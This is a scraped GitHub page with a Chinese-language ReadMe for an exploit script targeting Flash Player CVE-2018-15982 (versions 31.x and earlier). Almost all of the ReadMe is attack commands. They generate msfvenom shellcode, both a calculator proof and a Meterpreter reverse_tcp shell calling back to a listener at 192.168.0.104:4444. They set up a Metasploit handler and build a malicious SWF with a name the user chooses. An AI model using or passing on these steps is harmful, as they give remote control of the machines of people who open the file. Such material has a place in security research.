Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
CVE-2018-15982.py
ReadMe.md

ReadMe.md

CVE-2018-15982 REC

影响软件

  • Flash Player

影响版本

  • =< 31.x

复现

生成弹计算器

msfvenom -p windows/exec cmd=calc.exe -f raw > 86.bin

msfvenom -p windows/x64/exec cmd=calc.exe -f raw > 64.bin

python CVE-2018-15982.py -i 86.bin -I 64.bin -o apt.swf

生成meterpreter反弹

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f raw > 86.bin

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=I192.168.0.104 LPORT=4444 -f raw > 64.bin

Metasploit监听

msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set lhost IP地址

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

生成exploit.SWF文件

python CVE-2018-15982.py -i 86.bin -I 64.bin -o 你喜欢的文件名.swf
You can’t perform that action at this time.